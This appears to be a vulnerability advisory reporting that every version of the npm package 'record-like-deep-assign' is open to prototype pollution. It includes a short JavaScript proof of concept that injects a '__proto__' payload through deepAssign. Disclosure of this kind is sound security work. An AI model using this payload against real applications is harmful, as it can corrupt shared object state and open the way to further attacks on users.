Prototype Pollution in record-like-deep-assign

All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.

PoC

const deepAssign = require('record-like-deep-assign');
let obj = {};
console.log("Before being polluted: " + obj.polluted);
EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
deepAssign({}, EVIL_JSON);
console.log("After being polluted: " + obj.polluted);